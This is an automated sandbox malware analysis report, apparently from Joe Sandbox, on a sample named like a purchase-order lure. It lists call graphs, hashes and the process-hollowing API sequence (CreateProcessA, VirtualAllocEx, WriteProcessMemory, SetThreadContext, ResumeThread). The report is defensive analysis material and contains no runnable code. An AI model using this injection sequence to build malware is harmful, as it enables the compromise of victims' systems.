API calls 45334->45344 45345 4af43a7 45334->45345 45346 4af45f8 2 API calls 45334->45346 45347 4af47f8 2 API calls 45334->45347 45348 4af4796 4 API calls 45334->45348 45349 4af4cb3 3 API calls 45334->45349 45350 4af4653 2 API calls 45334->45350 45351 4af49f3 2 API calls 45334->45351 45352 4af4772 2 API calls 45334->45352 45353 4af4951 3 API calls 45334->45353 45335->45276 45336->45345 45337->45345 45338->45345 45339->45345 45340->45345 45341->45345 45342->45345 45343->45345 45344->45345 45345->45276 45346->45345 45347->45345 45348->45345 45349->45345 45350->45345 45351->45345 45352->45345 45353->45345 45355 4af4968 45354->45355 45436 4af1c38 45355->45436 45440 4af1c30 45355->45440 45356 4af4cef 45361 4af4777 45359->45361 45360 4af4942 45360->45304 45361->45360 45446 4af15b8 45361->45446 45450 4af15b0 45361->45450 45362 4af4525 45362->45304 45366 4af49f9 45365->45366 45368 4af15b8 ResumeThread 45366->45368 45369 4af15b0 ResumeThread 45366->45369 45367 4af4525 45367->45304 45368->45367 45369->45367 45455 4af1668 45370->45455 45459 4af1666 45370->45459 45371 4af4672 45375 4af4cce 45374->45375 45377 4af1c38 WriteProcessMemory 45375->45377 45378 4af1c30 2 API calls 45375->45378 45376 4af4cef 45377->45376 45378->45376 45382 4af1c30 2 API calls 45379->45382 45463 4af1b78 45379->45463 45467 4af1b70 45379->45467 45380 4af47b7 45382->45380 45385 4af4613 45384->45385 45387 4af15b8 ResumeThread 45385->45387 45388 4af15b0 ResumeThread 45385->45388 45386 4af4525 45386->45304 45387->45386 45388->45386 45390 4af4613 45389->45390 45392 4af15b8 ResumeThread 45390->45392 45393 4af15b0 ResumeThread 45390->45393 45391 4af4525 45391->45304 45392->45391 45393->45391 45395 4af4b24 45394->45395 45397 4af15b8 ResumeThread 45395->45397 45398 4af15b0 ResumeThread 45395->45398 45396 4af4525 45396->45304 45397->45396 45398->45396 45400 4af45bd 45399->45400 45402 4af1c38 WriteProcessMemory 45400->45402 45403 4af1c30 2 API calls 45400->45403 45401 4af45ce 45401->45304 45402->45401 45403->45401 45405 4af45bd 45404->45405 45407 4af1c38 WriteProcessMemory 45405->45407 45408 4af1c30 2 API calls 45405->45408 45406 4af45ce 45406->45304 45407->45406 45408->45406 45410 4af4a47 45409->45410 45411 4af4525 45409->45411 45410->45411 45412 4af1668 Wow64SetThreadContext 45410->45412 45413 4af1666 Wow64SetThreadContext 45410->45413 45411->45304 45412->45410 45413->45410 45415 4af474c 45414->45415 45416 4af4525 45415->45416 45417 4af1668 Wow64SetThreadContext 45415->45417 45418 4af1666 Wow64SetThreadContext 45415->45418 45416->45304 45417->45415 45418->45415 45420 4af4a81 45419->45420 45472 4af1d28 45420->45472 45476 4af1eb5 45423->45476 45481 4af1ec0 45423->45481 45428 4af4b43 45427->45428 45429 4af4525 45428->45429 45430 4af15b8 ResumeThread 45428->45430 45431 4af15b0 ResumeThread 45428->45431 45429->45304 45430->45429 45431->45429 45434 4af1c38 WriteProcessMemory 45432->45434 45435 4af1c30 2 API calls 45432->45435 45433 4af499d 45433->45304 45434->45433 45435->45433 45437 4af1c80 WriteProcessMemory 45436->45437 45439 4af1cd7 45437->45439 45439->45356 45441 4af1be3 VirtualAllocEx 45440->45441 45443 4af1c37 WriteProcessMemory 45440->45443 45442 4af1bf5 45441->45442 45442->45356 45445 4af1cd7 45443->45445 45445->45356 45447 4af15f8 ResumeThread 45446->45447 45449 4af1629 45447->45449 45449->45362 45451 4af15b7 ResumeThread 45450->45451 45453 4af1563 45450->45453 45454 4af1629 45451->45454 45453->45362 45454->45362 45456 4af16ad Wow64SetThreadContext 45455->45456 45458 4af16f5 45456->45458 45458->45371 45460 4af16ad Wow64SetThreadContext 45459->45460 45462 4af16f5 45460->45462 45462->45371 45464 4af1bb8 VirtualAllocEx 45463->45464 45466 4af1bf5 45464->45466 45466->45380 45468 4af1b77 VirtualAllocEx 45467->45468 45471 4af1b23 45467->45471 45470 4af1bf5 45468->45470 45470->45380 45471->45380 45473 4af1d73 ReadProcessMemory 45472->45473 45475 4af1db7 45473->45475 45477 4af1e6b 45476->45477 45478 4af1ebf CreateProcessA 45476->45478 45477->45304 45480 4af210b 45478->45480 45482 4af1f49 CreateProcessA 45481->45482 45484 4af210b 45482->45484 45484->45484 45503 11bacb0 45506 11bada8 45503->45506 45504 11bacbf 45507 11badb9 45506->45507 45508 11baddc 45506->45508 45507->45508 45514 11bb031 45507->45514 45518 11bb040 45507->45518 45508->45504 45509 11badd4 45509->45508 45510 11bafe0 GetModuleHandleW 45509->45510 45511 11bb00d 45510->45511 45511->45504 45515 11bb054 45514->45515 45516 11bb079 45515->45516 45522 11ba168 45515->45522 45516->45509 45519 11bb054 45518->45519 45520 11bb079 45519->45520 45521 11ba168 LoadLibraryExW 45519->45521 45520->45509 45521->45520 45523 11bb220 LoadLibraryExW 45522->45523 45525 11bb299 45523->45525 45525->45516 45526 f1d01c 45527 f1d034 45526->45527 45528 f1d08e 45527->45528 45531 50b2808 45527->45531 45536 50b2818 45527->45536 45532 50b2818 45531->45532 45533 50b2877 45532->45533 45541 50b2d88 45532->45541 45546 50b2da8 45532->45546 45537 50b2845 45536->45537 45538 50b2877 45537->45538 45539 50b2d88 2 API calls 45537->45539 45540 50b2da8 2 API calls 45537->45540 45539->45538 45540->45538 45542 50b2dbc 45541->45542 45551 50b2e50 45542->45551 45555 50b2e60 45542->45555 45543 50b2e48 45543->45533 45548 50b2dbc 45546->45548 45547 50b2e48 45547->45533 45549 50b2e50 2 API calls 45548->45549 45550 50b2e60 2 API calls 45548->45550 45549->45547 45550->45547 45552 50b2e60 45551->45552 45554 50b2e71 45552->45554 45558 50b4022 45552->45558 45554->45543 45556 50b2e71 45555->45556 45557 50b4022 2 API calls 45555->45557 45556->45543 45557->45556 45562 50b4040 45558->45562 45566 50b4050 45558->45566 45559 50b403a 45559->45554 45563 50b4050 45562->45563 45564 50b40ea CallWindowProcW 45563->45564 45565 50b4099 45563->45565 45564->45565 45565->45559 45567 50b4092 45566->45567 45569 50b4099 45566->45569 45568 50b40ea CallWindowProcW 45567->45568 45567->45569 45568->45569 45569->45559 45591 4af5290 45592 4af541b 45591->45592 45594 4af52b6 45591->45594 45594->45592 45595 4af3090 45594->45595 45596 4af5510 PostMessageW 45595->45596 45597 4af557c 45596->45597 45597->45594

                                        Executed Functions

                                        Function 04AF1C30 Relevance: 3.1, APIs: 2, Instructions: 94memoryinjectionCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 349 4af1c30-4af1c35 350 4af1c37-4af1c86 349->350 351 4af1be3-4af1bf3 VirtualAllocEx 349->351 355 4af1c88-4af1c94 350->355 356 4af1c96-4af1cd5 WriteProcessMemory 350->356 352 4af1bfc-4af1c21 351->352 353 4af1bf5-4af1bfb 351->353 353->352 355->356 360 4af1cde-4af1d0e 356->360 361 4af1cd7-4af1cdd 356->361 361->360
                                        APIs
                                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 04AF1BE6
                                        • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 04AF1CC8
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2016568014.0000000004AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4af0000_PO-2024)bekotas.jbxd
                                        Similarity
                                        • API ID: AllocMemoryProcessVirtualWrite
                                        • String ID:
                                        • API String ID: 645232735-0
                                        • Opcode ID: bf22b85f8f1b01885cbdf0b397b7f6c146d5e30c3943ea9ac22353b3c07a432b
                                        • Instruction ID: f44ed3818d6ec574c4f70ea84a4b8c176503d449007bb4d615dd1cf9e55ed1f9
                                        • Opcode Fuzzy Hash: bf22b85f8f1b01885cbdf0b397b7f6c146d5e30c3943ea9ac22353b3c07a432b
                                        • Instruction Fuzzy Hash: BB316AB6900209CFCB10DFA9C8457EEFBF1FF48310F10882AE559A7250D7789945CBA0
                                        Function 050FF6FF Relevance: 2.6, Strings: 2, Instructions: 137COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 470 50ff6ff-50ff743 472 50ff74a 470->472 473 50ff74f-50ff764 472->473 474 50ff76a 473->474 475 50ff883-50ff8cc 473->475 474->472 474->475 476 50ff80e-50ff81e 474->476 477 50ff7d9-50ff7eb 474->477 478 50ff855-50ff86d call 50ffbf4 474->478 479 50ff785-50ff7b3 474->479 480 50ff7b5-50ff7c1 474->480 481 50ff833-50ff850 474->481 482 50ff823-50ff82e 474->482 483 50ff771-50ff775 474->483 484 50ff7f0-50ff809 474->484 499 50ff8d4-50ff8dd 475->499 476->473 477->473 495 50ff873-50ff87e 478->495 479->473 496 50ff7c9-50ff7d4 480->496 481->473 482->473 486 50ff77e 483->486 487 50ff777-50ff77c 483->487 484->473 490 50ff783 486->490 487->490 490->473 495->473 496->473
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2017233756.00000000050F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_50f0000_PO-2024)bekotas.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: Te]q$Te]q
                                        • API String ID: 0-3320153681
                                        • Opcode ID: 4ada9a429e62f31ca02d6e79664d7b72fadd7c3f78ebd55d35f397b29b07fd2e
                                        • Instruction ID: 01a4a496fc64f40b8e11eb6d04a73461b26c74594fa1d56a392448d95bda0302
                                        • Opcode Fuzzy Hash: 4ada9a429e62f31ca02d6e79664d7b72fadd7c3f78ebd55d35f397b29b07fd2e
                                        • Instruction Fuzzy Hash: A151F775B10116CFDB08DFA8D9556BEBBB7FF88700F15806AE502EB390CA348D058B91
                                        Function 050FF718 Relevance: 2.6, Strings: 2, Instructions: 133COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 501 50ff718-50ff743 503 50ff74a 501->503 504 50ff74f-50ff764 503->504 505 50ff76a 504->505 506 50ff883-50ff8cc 504->506 505->503 505->506 507 50ff80e-50ff81e 505->507 508 50ff7d9-50ff7eb 505->508 509 50ff855-50ff86d call 50ffbf4 505->509 510 50ff785-50ff7b3 505->510 511 50ff7b5-50ff7c1 505->511 512 50ff833-50ff850 505->512 513 50ff823-50ff82e 505->513 514 50ff771-50ff775 505->514 515 50ff7f0-50ff809 505->515 530 50ff8d4-50ff8dd 506->530 507->504 508->504 526 50ff873-50ff87e 509->526 510->504 527 50ff7c9-50ff7d4 511->527 512->504 513->504 517 50ff77e 514->517 518 50ff777-50ff77c 514->518 515->504 521 50ff783 517->521 518->521 521->504 526->504 527->504
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2017233756.00000000050F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_50f0000_PO-2024)bekotas.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: Te]q$Te]q
                                        • API String ID: 0-3320153681
                                        • Opcode ID: 041aff4ffbaa5a341b405199b0aff0401756c97eb60bbdd12ceea737345156b7
                                        • Instruction ID: 128d945ea7e22a6a3fd2b8fb80eea60c094f4afaf6584a8a16239ceb9040948e
                                        • Opcode Fuzzy Hash: 041aff4ffbaa5a341b405199b0aff0401756c97eb60bbdd12ceea737345156b7
                                        • Instruction Fuzzy Hash: 1941B235B101168FDB48DFA9D9556AEFBB7FB88700F21452AE602EB794CA348D018B91
                                        Function 050B7D58 Relevance: .6, Instructions: 592COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2017165313.00000000050B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050B0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_50b0000_PO-2024)bekotas.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 4d8ae768b6f39c979ff0f4ca5e8db78e403eb6884d95959446514dbad736efcc
                                        • Instruction ID: fa3966e74c12efafc3b31abd26bb981e812c3f0d8e6bad5da61daa6b31215dee
                                        • Opcode Fuzzy Hash: 4d8ae768b6f39c979ff0f4ca5e8db78e403eb6884d95959446514dbad736efcc
                                        • Instruction Fuzzy Hash: 49524F34A002058FCB14DF68C884BD9B7B2FF85314F2586E9D5586F3A2DBB5A986CF41
                                        Function 050BAEB0 Relevance: .6, Instructions: 575COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2017165313.00000000050B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050B0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_50b0000_PO-2024)bekotas.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 19353378803cef294b4f1ea0a6f1cca3fe9e29247cf81842443a08803b6edf5d
                                        • Instruction ID: 566de9b29d3b75be32f4f637013f7522d63342682083c4d3cbe00ee1b17d46de
                                        • Opcode Fuzzy Hash: 19353378803cef294b4f1ea0a6f1cca3fe9e29247cf81842443a08803b6edf5d
                                        • Instruction Fuzzy Hash: B8524D34A002058FCB14DF68C984B99B7B2FF85314F2586A9D5586F3A2DBB5A986CF40
                                        Function 050FBB70 Relevance: .4, Instructions: 382COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2017233756.00000000050F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_50f0000_PO-2024)bekotas.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: c4ac79e1b5320f253213ebaf62e7df6582a99819ce91ba9b412936bf1b0dbcd6
                                        • Instruction ID: f92b5f7ac2ca9fbf306f39bb60d7281ac19d7acdddb0ec1d420827e504bef577
                                        • Opcode Fuzzy Hash: c4ac79e1b5320f253213ebaf62e7df6582a99819ce91ba9b412936bf1b0dbcd6
                                        • Instruction Fuzzy Hash: 0412C671D0061A8FCB50DF68C880AEDF7B1BF59300F11C6AAD959A7611EB70AAC5CF80
                                        Function 050FBB60 Relevance: .4, Instructions: 378COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2017233756.00000000050F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_50f0000_PO-2024)bekotas.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e13917f00fe3128f6da7cc2d08b1221bb6818d096844c91de9e8cb48d03d73aa
                                        • Instruction ID: c188c15754b74f6a2c4526e5aae85314600124dd52920204893997aea3ec7f00
                                        • Opcode Fuzzy Hash: e13917f00fe3128f6da7cc2d08b1221bb6818d096844c91de9e8cb48d03d73aa
                                        • Instruction Fuzzy Hash: AB12C771D0061A8FCB54DF68C880AEDF7B1BF59300F15C6AAD959A7611EB70AAC5CF80
                                        Function 050FFBF4 Relevance: .1, Instructions: 99COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2017233756.00000000050F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_50f0000_PO-2024)bekotas.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e4d40ebc586581d1b40fbc92d77cac6ed4397aaeb3a674b679ed2566de810264
                                        • Instruction ID: f8d7262696dc531534574d0d249919993807cc34555bf70ffbff0f4e4641cdb2
                                        • Opcode Fuzzy Hash: e4d40ebc586581d1b40fbc92d77cac6ed4397aaeb3a674b679ed2566de810264
                                        • Instruction Fuzzy Hash: 04313835B14126CFC708CE68F5915BEBBB3AB88208F11806BE906EBA51C631CD628781
                                        Function 04AF43EB Relevance: .1, Instructions: 63COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2016568014.0000000004AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4af0000_PO-2024)bekotas.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 020d4381065a8169005dccaed889dac0c95539a14019c29346126c309ad7f293
                                        • Instruction ID: 1f1b6ef8bc30abe13d83ecc06931a775193059bd7681a79514a89645568a1ac7
                                        • Opcode Fuzzy Hash: 020d4381065a8169005dccaed889dac0c95539a14019c29346126c309ad7f293
                                        • Instruction Fuzzy Hash: C921A9B1E056188BEB18CF678C0479EFAF7AFC9304F14C1A9C50CA6265EB354A858F40
                                        Function 04AF46FB Relevance: .0, Instructions: 22COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2016568014.0000000004AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4af0000_PO-2024)bekotas.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 0f84cea8ed58fffdf164d14091e7fc8a0a9bd97577a0a187c485e7230c9358c2
                                        • Instruction ID: f1995dcf2eb0ec59dda2d68dd9020ed66bb7bf19217eef3729271fedbb4608f9
                                        • Opcode Fuzzy Hash: 0f84cea8ed58fffdf164d14091e7fc8a0a9bd97577a0a187c485e7230c9358c2
                                        • Instruction Fuzzy Hash: 06D05E39A5D304CBCA10DEE09C413F6BABCFB1E244F443085AA0FE3201F330A8429A1A
                                        Function 050F5628 Relevance: 2.7, Strings: 2, Instructions: 212COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 366 50f5628-50f568a call 50f4728 372 50f568c-50f568e 366->372 373 50f56f0-50f571c 366->373 374 50f5694-50f56a0 372->374 375 50f5723-50f572b 372->375 373->375 379 50f56a6-50f56e1 call 50f4734 374->379 380 50f5732-50f586d 374->380 375->380 392 50f56e6-50f56ef 379->392 399 50f5873-50f5881 380->399 400 50f588a-50f58d0 399->400 401 50f5883-50f5889 399->401 406 50f58dd 400->406 407 50f58d2-50f58d5 400->407 401->400 408 50f58de 406->408 407->406 408->408
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2017233756.00000000050F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_50f0000_PO-2024)bekotas.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: Haq$Haq
                                        • API String ID: 0-4016896955
                                        • Opcode ID: 2486b87258614e50ad29bcd0036b3252e6e360cb0b945a2835b0d04cf8173d3a
                                        • Instruction ID: c74672bea7f58583cab8713caee937c73f94fa6de616ba7aafd30abf21682839
                                        • Opcode Fuzzy Hash: 2486b87258614e50ad29bcd0036b3252e6e360cb0b945a2835b0d04cf8173d3a
                                        • Instruction Fuzzy Hash: 3C815B74E003598FCB04DFA9D8946EEBFF6BF89300F14856AE409AB351DB749902CB91
                                        Function 050F39D8 Relevance: 2.7, Strings: 2, Instructions: 191COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 409 50f39d8-50f39fa 410 50f39fc-50f3a02 409->410 411 50f3a03-50f3a0d 409->411 413 50f3c49-50f3c74 call 50f2b00 411->413 414 50f3a13-50f3a2c 411->414 419 50f3c7b-50f3ccd call 50f2b00 413->419 414->419 420 50f3a32-50f3a54 414->420 428 50f3a56-50f3a64 420->428 429 50f3a65-50f3a74 420->429 434 50f3a99-50f3aba 429->434 435 50f3a76-50f3a93 429->435 443 50f3abc-50f3acd 434->443 444 50f3b0a-50f3b32 434->444 435->434 447 50f3acf-50f3ae7 443->447 448 50f3afc-50f3b00 443->448 466 50f3b35 call 50f3f1a 444->466 467 50f3b35 call 50f3f28 444->467 468 50f3b35 call 50f7901 444->468 469 50f3b35 call 50f4200 444->469 454 50f3aec-50f3afa 447->454 455 50f3ae9-50f3aea 447->455 448->444 451 50f3b38-50f3b5d 457 50f3b5f-50f3b74 451->457 458 50f3ba3 451->458 454->447 454->448 455->454 457->458 461 50f3b76-50f3b99 457->461 458->413 461->458 465 50f3b9b 461->465 465->458 466->451 467->451 468->451 469->451
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2017233756.00000000050F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_50f0000_PO-2024)bekotas.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: Haq$Haq
                                        • API String ID: 0-4016896955
                                        • Opcode ID: 0970ff74c372b48036357789360f5dd10e44f95a61ae60c3251100f06dfabe1c
                                        • Instruction ID: a03875c4a34bc876ae92760cf0dcc4c32ff098a610b243f797d349dfa8e5cbe5
                                        • Opcode Fuzzy Hash: 0970ff74c372b48036357789360f5dd10e44f95a61ae60c3251100f06dfabe1c
                                        • Instruction Fuzzy Hash: 47713B34B001188FCB48EBA8D5949EE77F2FF89310B2444A9D906AB7A5CF35ED41CB61
                                        Function 050F5D50 Relevance: 2.6, Strings: 2, Instructions: 115COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 532 50f5d50-50f5d72 534 50f5d7b-50f5d8b 532->534 535 50f5d74-50f5e4f 532->535 537 50f5e56-50f5f28 534->537 538 50f5d91-50f5da1 534->538 535->537 558 50f5f2f-50f5f4a 537->558 538->537 539 50f5da7-50f5dab 538->539 542 50f5dad 539->542 543 50f5db3-50f5dd2 539->543 542->537 542->543 544 50f5df9-50f5dfe 543->544 545 50f5dd4-50f5df4 call 50f47f4 call 50f4784 call 50f4794 543->545 547 50f5e07-50f5e1a call 50f4760 544->547 548 50f5e00-50f5e02 call 50f4804 544->548 545->544 547->558 559 50f5e20-50f5e27 547->559 548->547
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2017233756.00000000050F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_50f0000_PO-2024)bekotas.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: (aq$Haq
                                        • API String ID: 0-3785302501
                                        • Opcode ID: dd663b54723ca14825210a36e356638ca1754b2b97ce0536e685c5fbda8dd274
                                        • Instruction ID: 7c9b4150055c1e6c5783adc53431bad90a8c501b85c9afea55c9f3a4aa9e1be7
                                        • Opcode Fuzzy Hash: dd663b54723ca14825210a36e356638ca1754b2b97ce0536e685c5fbda8dd274
                                        • Instruction Fuzzy Hash: BE31A2707001099FCB48AFA9D8596BF7FABEFC5300F1584A9E505973A6DE348D039794
                                        Function 04AF1EB5 Relevance: 1.8, APIs: 1, Instructions: 272processCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1088 4af1eb5-4af1ebd 1089 4af1ebf-4af1f55 1088->1089 1090 4af1e6b-4af1e7a 1088->1090 1093 4af1f8e-4af1fae 1089->1093 1094 4af1f57-4af1f61 1089->1094 1095 4af1e7c-4af1e82 1090->1095 1096 4af1e83-4af1ea8 1090->1096 1103 4af1fe7-4af2016 1093->1103 1104 4af1fb0-4af1fba 1093->1104 1094->1093 1097 4af1f63-4af1f65 1094->1097 1095->1096 1100 4af1f88-4af1f8b 1097->1100 1101 4af1f67-4af1f71 1097->1101 1100->1093 1105 4af1f75-4af1f84 1101->1105 1106 4af1f73 1101->1106 1115 4af204f-4af2109 CreateProcessA 1103->1115 1116 4af2018-4af2022 1103->1116 1104->1103 1107 4af1fbc-4af1fbe 1104->1107 1105->1105 1109 4af1f86 1105->1109 1106->1105 1110 4af1fe1-4af1fe4 1107->1110 1111 4af1fc0-4af1fca 1107->1111 1109->1100 1110->1103 1113 4af1fce-4af1fdd 1111->1113 1114 4af1fcc 1111->1114 1113->1113 1117 4af1fdf 1113->1117 1114->1113 1127 4af210b-4af2111 1115->1127 1128 4af2112-4af2198 1115->1128 1116->1115 1118 4af2024-4af2026 1116->1118 1117->1110 1120 4af2049-4af204c 1118->1120 1121 4af2028-4af2032 1118->1121 1120->1115 1122 4af2036-4af2045 1121->1122 1123 4af2034 1121->1123 1122->1122 1124 4af2047 1122->1124 1123->1122 1124->1120 1127->1128 1138 4af219a-4af219e 1128->1138 1139 4af21a8-4af21ac 1128->1139 1138->1139 1142 4af21a0 1138->1142 1140 4af21ae-4af21b2 1139->1140 1141 4af21bc-4af21c0 1139->1141 1140->1141 1143 4af21b4 1140->1143 1144 4af21c2-4af21c6 1141->1144 1145 4af21d0-4af21d4 1141->1145 1142->1139 1143->1141 1144->1145 1146 4af21c8 1144->1146 1147 4af21e6-4af21ed 1145->1147 1148 4af21d6-4af21dc 1145->1148 1146->1145 1149 4af21ef-4af21fe 1147->1149 1150 4af2204 1147->1150 1148->1147 1149->1150 1151 4af2205 1150->1151 1151->1151
                                        APIs
                                        • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 04AF20F6
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2016568014.0000000004AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4af0000_PO-2024)bekotas.jbxd
                                        Similarity
                                        • API ID: CreateProcess
                                        • String ID:
                                        • API String ID: 963392458-0
                                        • Opcode ID: b79815b756be8498f7a79d768823513dfe69d01ab4ffb1969842890f9e397406
                                        • Instruction ID: 46554cba34a3a3abcf7d81d7fc935f680e4bb165f365f058bba78806c2ad3ded
                                        • Opcode Fuzzy Hash: b79815b756be8498f7a79d768823513dfe69d01ab4ffb1969842890f9e397406
                                        • Instruction Fuzzy Hash: DDA17A71D00219CFEB24CFA8CC407EDBBB2BF44314F1485AAE909A7290DB75A985CF91
                                        Function 04AF1EC0 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1153 4af1ec0-4af1f55 1155 4af1f8e-4af1fae 1153->1155 1156 4af1f57-4af1f61 1153->1156 1161 4af1fe7-4af2016 1155->1161 1162 4af1fb0-4af1fba 1155->1162 1156->1155 1157 4af1f63-4af1f65 1156->1157 1159 4af1f88-4af1f8b 1157->1159 1160 4af1f67-4af1f71 1157->1160 1159->1155 1163 4af1f75-4af1f84 1160->1163 1164 4af1f73 1160->1164 1172 4af204f-4af2109 CreateProcessA 1161->1172 1173 4af2018-4af2022 1161->1173 1162->1161 1165 4af1fbc-4af1fbe 1162->1165 1163->1163 1166 4af1f86 1163->1166 1164->1163 1167 4af1fe1-4af1fe4 1165->1167 1168 4af1fc0-4af1fca 1165->1168 1166->1159 1167->1161 1170 4af1fce-4af1fdd 1168->1170 1171 4af1fcc 1168->1171 1170->1170 1174 4af1fdf 1170->1174 1171->1170 1184 4af210b-4af2111 1172->1184 1185 4af2112-4af2198 1172->1185 1173->1172 1175 4af2024-4af2026 1173->1175 1174->1167 1177 4af2049-4af204c 1175->1177 1178 4af2028-4af2032 1175->1178 1177->1172 1179 4af2036-4af2045 1178->1179 1180 4af2034 1178->1180 1179->1179 1181 4af2047 1179->1181 1180->1179 1181->1177 1184->1185 1195 4af219a-4af219e 1185->1195 1196 4af21a8-4af21ac 1185->1196 1195->1196 1199 4af21a0 1195->1199 1197 4af21ae-4af21b2 1196->1197 1198 4af21bc-4af21c0 1196->1198 1197->1198 1200 4af21b4 1197->1200 1201 4af21c2-4af21c6 1198->1201 1202 4af21d0-4af21d4 1198->1202 1199->1196 1200->1198 1201->1202 1203 4af21c8 1201->1203 1204 4af21e6-4af21ed 1202->1204 1205 4af21d6-4af21dc 1202->1205 1203->1202 1206 4af21ef-4af21fe 1204->1206 1207 4af2204 1204->1207 1205->1204 1206->1207 1208 4af2205 1207->1208 1208->1208
                                        APIs
                                        • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 04AF20F6
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2016568014.0000000004AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4af0000_PO-2024)bekotas.jbxd
                                        Similarity
                                        • API ID: CreateProcess
                                        • String ID:
                                        • API String ID: 963392458-0
                                        • Opcode ID: 0d1d66cc9ef06c8ae0fcee464bbbc44d3f018b3d28704a2f97abfc755f597ae8
                                        • Instruction ID: c6cd5d3f6d79f6479448d3b986d74c13e4e6df9615a5367524623b8c5f7d72d5
                                        • Opcode Fuzzy Hash: 0d1d66cc9ef06c8ae0fcee464bbbc44d3f018b3d28704a2f97abfc755f597ae8
                                        • Instruction Fuzzy Hash: 94916D71D00219DFEB24CFA8CC41BDDBBB2BF44314F0485AAE909A7290DB75A985CF91
                                        Function 011BADA8 Relevance: 1.7, APIs: 1, Instructions: 197COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
